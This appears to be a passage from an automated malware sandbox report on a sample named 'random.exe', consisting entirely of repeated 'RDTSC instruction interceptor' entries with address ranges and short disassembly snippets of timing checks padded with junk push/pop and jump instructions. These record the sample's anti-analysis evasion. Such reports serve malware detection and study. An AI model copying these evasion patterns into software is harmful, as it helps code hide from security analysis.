Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10922A1 second address: 10922DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4C44C2BE34h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F4C44C2BE36h 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F4C44C2BE26h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10922DD second address: 10922E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10922E1 second address: 10922E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10922E5 second address: 10922F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4C45470A76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10922F5 second address: 10922FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10922FB second address: 10922FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10928CD second address: 10928D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1092DF2 second address: 1092E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4C45470A80h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1092E09 second address: 1092E26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE34h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1093749 second address: 109374D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109374D second address: 1093753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1093A33 second address: 1093A39 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1098126 second address: 1098149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F4C44C2BE37h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1098149 second address: 1098155 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4C45470A76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1097441 second address: 1097456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F4C44C2BE26h 0x0000000a jmp 00007F4C44C2BE2Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1097456 second address: 109745A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109785B second address: 1097879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10979D8 second address: 10979DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10979DC second address: 10979E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10979E4 second address: 1097A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4C45470A88h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1097CDA second address: 1097CF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1097CF8 second address: 1097D16 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jns 00007F4C45470A76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F4C45470A7Ah 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 jg 00007F4C45470A7Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109CAB3 second address: 109CAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109CAB9 second address: 109CABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A2DA2 second address: 10A2DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4C44C2BE26h 0x0000000a jnl 00007F4C44C2BE26h 0x00000010 popad 0x00000011 jg 00007F4C44C2BE2Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A2DBF second address: 10A2DDE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4C45470A84h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A309C second address: 10A30A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A30A2 second address: 10A30A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A30A6 second address: 10A30AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A30AD second address: 10A30B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A30B5 second address: 10A30F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F4C44C2BE42h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4C44C2BE31h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A30F4 second address: 10A30FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A30FC second address: 10A3101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A3280 second address: 10A32B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C45470A89h 0x00000009 jmp 00007F4C45470A81h 0x0000000e popad 0x0000000f pushad 0x00000010 jnl 00007F4C45470A76h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A33ED second address: 10A33F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A3829 second address: 10A382D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A382D second address: 10A383B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnl 00007F4C44C2BE26h 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A468C second address: 10A4690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A4690 second address: 10A46B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F4C44C2BE39h 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A46B5 second address: 10A46DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4C45470A7Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4C45470A85h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A2545 second address: 10A254F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4C44C2BE26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A254F second address: 10A2553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A2553 second address: 10A255C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A88A1 second address: 10A88AB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4C45470A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AD14A second address: 10AD14E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AD14E second address: 10AD178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F4C45470A8Fh 0x0000000c jmp 00007F4C45470A83h 0x00000011 jno 00007F4C45470A76h 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AD178 second address: 10AD17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AD2DB second address: 10AD2E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AD2E1 second address: 10AD2E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AD2E5 second address: 10AD319 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4C45470A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F4C45470A7Ch 0x00000013 push edx 0x00000014 jmp 00007F4C45470A89h 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AD319 second address: 10AD31F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AD31F second address: 10AD329 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AD329 second address: 10AD32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BB9EE second address: 10BB9F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BB9F2 second address: 10BB9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BB568 second address: 10BB581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4C45470A84h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C0A79 second address: 10C0A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C0A84 second address: 10C0A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C0A88 second address: 10C0A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C0633 second address: 10C0660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A84h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F4C45470A78h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F4C45470A78h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C07AF second address: 10C07B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C537F second address: 10C5393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A80h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C852E second address: 10C8562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C44C2BE34h 0x00000009 jmp 00007F4C44C2BE37h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C8562 second address: 10C8566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C9B15 second address: 10C9B3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE31h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4C44C2BE2Dh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C9B3C second address: 10C9B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D07FF second address: 10D0805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D3577 second address: 10D357F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D357F second address: 10D3585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE764D second address: FE7672 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F4C45470A84h 0x0000000e jo 00007F4C45470A76h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D3382 second address: 10D33AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push esi 0x00000008 jmp 00007F4C44C2BE34h 0x0000000d jng 00007F4C44C2BE26h 0x00000013 pop esi 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D33AB second address: 10D33C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C45470A81h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D33C0 second address: 10D33D3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4C44C2BE26h 0x00000008 jnl 00007F4C44C2BE26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DAD39 second address: 10DAD68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4C45470A7Bh 0x00000010 push ecx 0x00000011 jmp 00007F4C45470A7Fh 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D98DD second address: 10D98E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D98E3 second address: 10D98FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F4C45470A7Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F4C45470A76h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D9C0B second address: 10D9C15 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D9D91 second address: 10D9D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D9D96 second address: 10D9D9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D9EFC second address: 10D9F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F4C45470A7Dh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4C45470A7Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D9F20 second address: 10D9F24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10D9F24 second address: 10D9F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jne 00007F4C45470A76h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DA099 second address: 10DA0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DA0A1 second address: 10DA0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4C45470A80h 0x0000000a jmp 00007F4C45470A85h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F4C45470A76h 0x0000001a jp 00007F4C45470A76h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DA0DC second address: 10DA0E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DA0E0 second address: 10DA0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DA0EC second address: 10DA0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DA0F0 second address: 10DA0F6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DA0F6 second address: 10DA0FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10DE6B3 second address: 10DE6C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C45470A80h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10E4F44 second address: 10E4F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10E4F4A second address: 10E4F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10E4F50 second address: 10E4F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10E4F59 second address: 10E4F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10E4F5D second address: 10E4F63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10EED45 second address: 10EED49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10EED49 second address: 10EED64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE2Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F4C44C2BE2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10F1EB8 second address: 10F1EC2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4C45470A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1102D48 second address: 1102D4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1102D4C second address: 1102D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F4C45470A76h 0x0000000e jns 00007F4C45470A76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1105788 second address: 11057A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE36h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
